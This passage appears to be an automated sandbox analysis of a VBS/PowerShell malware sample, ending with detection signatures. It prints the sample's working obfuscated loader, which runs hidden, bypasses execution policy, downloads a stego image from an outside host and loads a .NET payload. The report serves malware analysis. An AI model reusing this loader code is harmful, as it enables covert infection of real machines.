wvHbRIwOrvHbRIwOCcvHbRIwOKvHbRIwOBivHbRIwOHUvHbRIwOMvHbRIwOBivHbRIwOGEvHbRIwOcwBlvHbRIwODYvHbRIwONvHbRIwOBDvHbRIwOG8vHbRIwObQBtvHbRIwOGEvHbRIwObgBkvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOBsvHbRIwOG8vHbRIwOYQBkvHbRIwOGUvHbRIwOZvHbRIwOBBvHbRIwOHMvHbRIwOcwBlvHbRIwOG0vHbRIwOYgBsvHbRIwOHkvHbRIwOIvHbRIwOvHbRIwO9vHbRIwOCvHbRIwOvHbRIwOWwBTvHbRIwOHkvHbRIwOcwB0vHbRIwOCcvHbRIwOKwvHbRIwOnvHbRIwOGUvHbRIwObQvHbRIwOuvHbRIwOFIvHbRIwOZQBmvHbRIwOGwvHbRIwOZQBjvHbRIwOHQvHbRIwOaQBvvHbRIwOG4vHbRIwOLgBBvHbRIwOHMvHbRIwOcwBlvHbRIwOG0vHbRIwOYgBsvHbRIwOHkvHbRIwOXQvHbRIwO6vHbRIwODovHbRIwOTvHbRIwOBvvHbRIwOGEvHbRIwOZvHbRIwOvHbRIwOovHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGMvHbRIwObwBtvHbRIwOG0vHbRIwOYQBuvHbRIwOGQvHbRIwOQgB5vHbRIwOHQvHbRIwOZQBzvHbRIwOCkvHbRIwOOwBivHbRIwOHUvHbRIwOMvHbRIwOB0vHbRIwOHkvHbRIwOcvHbRIwOBlvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOGwvHbRIwObwBhvHbRIwOGQvHbRIwOZQBkvHbRIwOEEvHbRIwOcwBzvHbRIwOGUvHbRIwObQBivHbRIwOGwvHbRIwOeQvHbRIwOuvHbRIwOEcvHbRIwOZQB0vHbRIwOFQvHbRIwOeQBwvHbRIwOGUvHbRIwOKvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOBDvHbRIwOGwvHbRIwOYQBzvHbRIwOHMvHbRIwOTvHbRIwOvHbRIwOnvHbRIwOCsvHbRIwOJwBpvHbRIwOGIvHbRIwOcgBhvHbRIwOHIvHbRIwOeQvHbRIwOzvHbRIwOC4vHbRIwOQwBsvHbRIwOGEvHbRIwOcwBzvHbRIwODEvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOKQvHbRIwO7vHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOG0vHbRIwOZQB0vHbRIwOGgvHbRIwObwBkvHbRIwOCvHbRIwOvHbRIwOPQvHbRIwOgvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOHQvHbRIwOeQBwvHbRIwOGUvHbRIwOLgBHvHbRIwOGUvHbRIwOdvHbRIwOBNvHbRIwOGUvHbRIwOdvHbRIwOBovHbRIwOG8vHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOZvHbRIwOvHbRIwOovHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOFIvHbRIwOdQBuvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCkvHbRIwOLgBJvHbRIwOG4vHbRIwOdgBvvHbRIwOGsvHbRIwOZQvHbRIwOovHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOG4vHbRIwOdQBsvHbRIwOGwvHbRIwOLvHbRIwOvHbRIwOgvHbRIwOFsvHbRIwObwBivHbRIwOGovHbRIwOZQBjvHbRIwOHQvHbRIwOWwBdvHbRIwOF0vHbRIwOIvHbRIwOvHbRIwOovHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGQvHbRIwOSvHbRIwOvHbRIwOnvHbRIwOCsvHbRIwOJwBovHbRIwODvHbRIwOvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwOTvHbRIwOBrvHbRIwODEvHbRIwOSvHbRIwOBXvHbRIwOGkvHbRIwOOvHbRIwOB3vHbRIwOE0vHbRIwORvHbRIwOBNvHbRIwOHYvHbRIwOTwBDvHbRIwODQvHbRIwOegBOvHbRIwOEMvHbRIwONvHbRIwOvHbRIwO0vHbRIwOE0vHbRIwOagBJvHbRIwOHUvHbRIwOTgBqvHbRIwOFkvHbRIwOdgBMvHbRIwOHovHbRIwOcvHbRIwOB3vHbRIwOGQvHbRIwOSvHbRIwOBSvHbRIwOG8vHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOIvHbRIwOvHbRIwOsvHbRIwOCvHbRIwOvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOIvHbRIwOvHbRIwOsvHbRIwOCvHbRIwOvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOMgBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOgvHbRIwOCwvHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOByvHbRIwOGUvHbRIwOZwBhvHbRIwOHMvHbRIwOJwvHbRIwOrvHbRIwOCcvHbRIwObQBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOgvHbRIwOCwvHbRIwOIvHbRIwOBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwO2vHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCvHbRIwOvHbRIwOLvHbRIwOvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOEMvHbRIwOOgBtvHbRIwOEsvHbRIwOMwBQvHbRIwOHIvHbRIwObwBnvHbRIwOHIvHbRIwOYQBtvHbRIwOEQvHbRIwOYQB0vHbRIwOGEvHbRIwObQBLvHbRIwODMvHbRIwOTwBrvHbRIwODvHbRIwOvHbRIwOLvHbRIwOvHbRIwOgvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOGgvHbRIwOdvHbRIwOBtvHbRIwOGwvHbRIwOagBpvHbRIwOE8vHbRIwOawvHbRIwOwvHbRIwOCkvHbRIwOKQvHbRIwOnvHbRIwOCkvHbRIwOIvHbRIwOvHbRIwOtvHbRIwOHIvHbRIwOZQBQvHbRIwOGwvHbRIwOYQBjvHbRIwOGUvHbRIwOJwBPvHbRIwOGsvHbRIwOMvHbRIwOvHbRIwOnvHbRIwOCwvHbRIwOWwBDvHbRIwOGgvHbRIwOYQByvHbRIwOF0vHbRIwOMwvHbRIwO5vHbRIwOC0vHbRIwOQwBSvHbRIwOGUvHbRIwOUvHbRIwOBsvHbRIwOGEvHbRIwOYwBFvHbRIwOCvHbRIwOvHbRIwOIvHbRIwOvHbRIwOnvHbRIwOGIvHbRIwOdQvHbRIwOwvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwOzvHbRIwODYvHbRIwOIvHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOcgBlvHbRIwOFvHbRIwOvHbRIwObvHbRIwOBhvHbRIwOGMvHbRIwOZQvHbRIwOnvHbRIwOG0vHbRIwOSwvHbRIwOzvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwO5vHbRIwODIvHbRIwOKQvHbRIwOgvHbRIwOHwvHbRIwOIvHbRIwOvHbRIwOuvHbRIwOCvHbRIwOvHbRIwOKvHbRIwOvHbRIwOgvHbRIwOCQvHbRIwORQBuvHbRIwOFYvHbRIwOOgBDvHbRIwOG8vHbRIwOTQBzvHbRIwOFvHbRIwOvHbRIwOZQBDvHbRIwOFsvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONQBdvHbRIwOC0vHbRIwOagBPvHbRIwOGkvHbRIwOTgvHbRIwOnvHbRIwOCcvHbRIwOKQvHbRIwO=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bu0imageUrl = Ok0https://uploaddei'+'magen'+'s.com.br/ima'+'ges/004/683/779/original/download.jpg?1701878864Ok0;bu0webClient = New-Object System.Net.WebClient;bu0imageBytes = bu0webCl'+'ient.DownloadData(bu0imageUrl);bu0imageText = [Sy'+'stem.Text.Encoding]::UTF8.GetString(bu0imageBytes);bu0startFlag = Ok0<<BASE64_START>>Ok0;bu0endFl'+'ag = Ok0<<BASE64_END>>Ok0;bu0startIndex = bu0imageText.IndexOf(bu0startFlag);bu0endIndex = '+'bu0imageText.IndexOf(bu0endF'+'lag);bu0sta'+'rtIndex -ge 0 -and bu0endIndex -gt bu0startIn'+'dex;bu0startIndex += bu0startFlag.Length;bu0base64Length = bu0endIndex - bu0startIndex;bu0base64Command = bu0imageText.S'+'ubstring(bu0sta'+'rtIndex, bu0'+'base64Length);bu0co'+'mmandBytes = [System.Convert]::FromBase64String'+'(bu0base64Command);bu0loadedAssembly = [Syst'+'em.Reflection.Assembly]::Load(bu0commandBytes);bu0type = bu0loadedAssembly.GetType(Ok0ClassL'+'ibrary3.Class1Ok0);bu0method = bu0type.GetMetho'+'d(Ok0RunOk0).Invoke(bu0null, [object[]] (Ok0dH'+'h0'+'Lk1HWi8wMDMvOC4zNC44MjIuNjYvLzpwdHRoOk0 , Ok0Ok0 , Ok02Ok0 , Ok0regas'+'mOk0 , Ok06Ok0 , Ok0C:mK3ProgramDatamK3Ok0, Ok0htmljiOk0))') -rePlace'Ok0',[Char]39-CRePlacE 'bu0',[Char]36 -rePlace'mK3',[Char]92) \| . ( $EnV:CoMsPeC[4,24,25]-jOiN'')"

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

MicrosoftHealthcheck.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All